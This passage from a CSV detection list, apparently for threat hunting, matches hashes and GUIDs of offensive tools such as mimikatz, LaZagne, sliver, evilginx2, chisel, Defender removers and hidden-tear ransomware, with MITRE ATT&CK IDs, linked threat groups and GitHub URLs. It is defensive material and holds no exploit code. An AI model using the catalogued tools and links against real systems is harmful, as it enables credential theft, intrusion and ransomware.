T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25030" "*3C601672-7389-42B2-B5C9-059846E1DA88*",".{0,1000}3C601672\-7389\-42B2\-B5C9\-059846E1DA88.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/TheD1rkMtr/TakeMyRDP","1","0","#GUIDproject","N/A","N/A","4","386","63","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z","25031" "*3c625eb5dbccce53faab97b9bfd0ef14f6c08730eae0d6442d201a64597c96ea*",".{0,1000}3c625eb5dbccce53faab97b9bfd0ef14f6c08730eae0d6442d201a64597c96ea.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","25032" "*3c6843232a8479a389876f73cf69d7277ae2c7e635918699e183c062799dbd16*",".{0,1000}3c6843232a8479a389876f73cf69d7277ae2c7e635918699e183c062799dbd16.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","25034" "*3c6898fa2726b6487fcb12b854021b4e23f984e2bcdf5b5fe300c36cec2ad1a4*",".{0,1000}3c6898fa2726b6487fcb12b854021b4e23f984e2bcdf5b5fe300c36cec2ad1a4.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","#filehash","N/A","10","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","25035" "*3C8AA457-3659-4CDD-A685-66F7ED10DC4F*",".{0,1000}3C8AA457\-3659\-4CDD\-A685\-66F7ED10DC4F.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","#GUIDproject","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","25042" "*3c9f2deb4c664d6321474815f4fefa2c80778fe2da2a9a35d1a31f2f9106bf96*",".{0,1000}3c9f2deb4c664d6321474815f4fefa2c80778fe2da2a9a35d1a31f2f9106bf96.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","25046" "*3c9fdaf1fc583a55cb67fbbd267e295773495cfb3e18dd0b6dfe4db8e9d82a44*",".{0,1000}3c9fdaf1fc583a55cb67fbbd267e295773495cfb3e18dd0b6dfe4db8e9d82a44.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","25047" "*3ca57afb3c9a3154212ad9f9eb323ce2cae89d046e5bf05acb5730a311e4e9f3*",".{0,1000}3ca57afb3c9a3154212ad9f9eb323ce2cae89d046e5bf05acb5730a311e4e9f3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration 
toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25048" "*3cb19c7a026a600cb480bcf0f799c9e050e7e3f6fbd9a0cd71658a408b81f787*",".{0,1000}3cb19c7a026a600cb480bcf0f799c9e050e7e3f6fbd9a0cd71658a408b81f787.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25049" "*3cb401fdba1a0e74389ac9998005805f1d3e8ed70018d282f5885410d48725e1*",".{0,1000}3cb401fdba1a0e74389ac9998005805f1d3e8ed70018d282f5885410d48725e1.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","25050" "*3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05*",".{0,1000}3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","25053" "*3cc61a5e594a228e108fdbfb991ac45838ad15bf632f112cc185c356889e322d*",".{0,1000}3cc61a5e594a228e108fdbfb991ac45838ad15bf632f112cc185c356889e322d.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","25054" "*3ccb81e184f94e47a9a7c7e75978ad9eda2850967b0a2e03a505776e4969b8a2*",".{0,1000}3ccb81e184f94e47a9a7c7e75978ad9eda2850967b0a2e03a505776e4969b8a2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","25056" "*3cd433ed1ca4566eade23d65399ebc7399e230fcdbde56deb29891e0213aefc1*",".{0,1000}3cd433ed1ca4566eade23d65399ebc7399e230fcdbde56deb29891e0213aefc1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25057" "*3cda8f83a369ed200d702d90fad07f1d6ea719a876367ce0d7629b7ad2dfec05*",".{0,1000}3cda8f83a369ed200d702d90fad07f1d6ea719a876367ce0d7629b7ad2dfec05.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25059" "*3cdc3d8cd16161b7abedad3d2ed17ce49f03a5ab8b1bf6c09bffd6513f8ba4e0*",".{0,1000}3cdc3d8cd16161b7abedad3d2ed17ce49f03a5ab8b1bf6c09bffd6513f8ba4e0.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","25060" "*3ce3579ba41d1ccab336da1f8768a257142c3f6eee0e8daac2605065e3a43234*",".{0,1000}3ce3579ba41d1ccab336da1f8768a257142c3f6eee0e8daac2605065e3a43234.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","25061" 
"*3ce51c89b8367bae6cae0ff3fa4bbe420df215568e10af5f7b29b3e19048a2e8*",".{0,1000}3ce51c89b8367bae6cae0ff3fa4bbe420df215568e10af5f7b29b3e19048a2e8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25063" "*3cef33596211f12ca62d6c531f5e6d31351616888eee9ddc4a315d49660adf56*",".{0,1000}3cef33596211f12ca62d6c531f5e6d31351616888eee9ddc4a315d49660adf56.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25065" "*3cf09d5b03a365d25d2283bfdc5aabda01ae9a6e24147312bcef9b741e25df26*",".{0,1000}3cf09d5b03a365d25d2283bfdc5aabda01ae9a6e24147312bcef9b741e25df26.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25066" "*3CFB521D-40ED-4891-8B6C-ED0644A237C1*",".{0,1000}3CFB521D\-40ED\-4891\-8B6C\-ED0644A237C1.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. 
(through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#GUIDproject","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","25067" "*3cfff321b41acc3cdf87f4e112d201a3b2a4708dc370a97f7eaed419c258f206*",".{0,1000}3cfff321b41acc3cdf87f4e112d201a3b2a4708dc370a97f7eaed419c258f206.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25068" "*3d00518d63ef9b656fdef85621d8a4f3137569ea71b07d431da6b39704f54dee*",".{0,1000}3d00518d63ef9b656fdef85621d8a4f3137569ea71b07d431da6b39704f54dee.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","25069" "*3d072fb48ae49e6cf6e94af84c2e6ba2c278a1189ac12b0e51b232462f3865d1*",".{0,1000}3d072fb48ae49e6cf6e94af84c2e6ba2c278a1189ac12b0e51b232462f3865d1.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25071" 
"*3d0ab78d9ceb76cae4a8a600ebfcf3e078ccc5b19038edf73fcf9653f26d7064*",".{0,1000}3d0ab78d9ceb76cae4a8a600ebfcf3e078ccc5b19038edf73fcf9653f26d7064.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#filehash","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","25072" "*3d0e06086768500a2bf680ffbed0409d24b355887169b821d55233529ad2c62a*",".{0,1000}3d0e06086768500a2bf680ffbed0409d24b355887169b821d55233529ad2c62a.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25073" "*3d0e06086768500a2bf680ffbed0409d24b355887169b821d55233529ad2c62a*",".{0,1000}3d0e06086768500a2bf680ffbed0409d24b355887169b821d55233529ad2c62a.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - 
T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","25074" "*3D111394-E7F7-40B7-91CB-D24374DB739A*",".{0,1000}3D111394\-E7F7\-40B7\-91CB\-D24374DB739A.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#GUIDproject","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","25075" "*3d136d26be0a8879daf18698d9b1e19a4c7a3ef095568a03d4b7a9e0f270034c*",".{0,1000}3d136d26be0a8879daf18698d9b1e19a4c7a3ef095568a03d4b7a9e0f270034c.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","25077" 
"*3d165b4880de5247fc9cc4aca2f0d31fc4cfa52fefc08c18e80c3f5b976b545f*",".{0,1000}3d165b4880de5247fc9cc4aca2f0d31fc4cfa52fefc08c18e80c3f5b976b545f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25078" "*3d19ac0793c77c50db5f030000ca60dfbc95bd0bb7f90384ad03526c1ab5e902*",".{0,1000}3d19ac0793c77c50db5f030000ca60dfbc95bd0bb7f90384ad03526c1ab5e902.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","25079" "*3d27ba8268164db337978538c6e6c33e0b91194d184e6b6b73f1089a425a60f5*",".{0,1000}3d27ba8268164db337978538c6e6c33e0b91194d184e6b6b73f1089a425a60f5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","25080" "*3d2b4aa76b770b3421f0867aa68b42a1a17f723df251d81af9459f3a872a6fc4*",".{0,1000}3d2b4aa76b770b3421f0867aa68b42a1a17f723df251d81af9459f3a872a6fc4.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source 
application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","25081" "*3d2fcfc2a950657e9e5961d625ca07b8cf900cf4fffdc3e39ca9078bcf156f3d*",".{0,1000}3d2fcfc2a950657e9e5961d625ca07b8cf900cf4fffdc3e39ca9078bcf156f3d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25082" "*3d3b65e7218d4308123058903295053c581d7f918ea6a7ddf61391d854febb36*",".{0,1000}3d3b65e7218d4308123058903295053c581d7f918ea6a7ddf61391d854febb36.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","25083" 
"*3d3f4263b35b7ef1bc8b9e9a70f9ef9b6b5625ee20bc5605d13607bcba64a5c2*",".{0,1000}3d3f4263b35b7ef1bc8b9e9a70f9ef9b6b5625ee20bc5605d13607bcba64a5c2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25085" "*3d40e9cae263cedef7c3ae6b75a0d87deeb62288513355ff4a441d5e346d456d*",".{0,1000}3d40e9cae263cedef7c3ae6b75a0d87deeb62288513355ff4a441d5e346d456d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25086" "*3d43ec6d4f223272bf31597619e5799de07eaba84fd4c5a57f8344010e0581a0*",".{0,1000}3d43ec6d4f223272bf31597619e5799de07eaba84fd4c5a57f8344010e0581a0.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","25087" "*3d4861f420ef8bf0dd78fdc226a67be234217f607541a5ec2b0f0e6e15893235*",".{0,1000}3d4861f420ef8bf0dd78fdc226a67be234217f607541a5ec2b0f0e6e15893235.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25089" "*3d505640278c986f4d6f644c64b28b338063003e54baa3826907c1c235a57c44*",".{0,1000}3d505640278c986f4d6f644c64b28b338063003e54baa3826907c1c235a57c44.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","25091" "*3d5c8b987186dc4ea84388408e0f0cc8b4026bb509e4ee4d8f8d090896ba1a7b*",".{0,1000}3d5c8b987186dc4ea84388408e0f0cc8b4026bb509e4ee4d8f8d090896ba1a7b.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25092" "*3d63505863fa5f18ff990c4686a21d17fd618da9ca2490c22d0f7f5045f3581f*",".{0,1000}3d63505863fa5f18ff990c4686a21d17fd618da9ca2490c22d0f7f5045f3581f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25094" "*3d63d98655436fa1bd05ede7afdc60fd2418f18cf64da091a5ae1bf7f1923687*",".{0,1000}3d63d98655436fa1bd05ede7afdc60fd2418f18cf64da091a5ae1bf7f1923687.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25095" "*3d6819160cb77ce2d0446449a6b7584dd02ef694762b3ef0cd57563a10c111f6*",".{0,1000}3d6819160cb77ce2d0446449a6b7584dd02ef694762b3ef0cd57563a10c111f6.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","25096" "*3d686ba6d6985ff3febf3cd3d45cb5eb18eff45bfec74142865ded01f9c00503*",".{0,1000}3d686ba6d6985ff3febf3cd3d45cb5eb18eff45bfec74142865ded01f9c00503.{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential 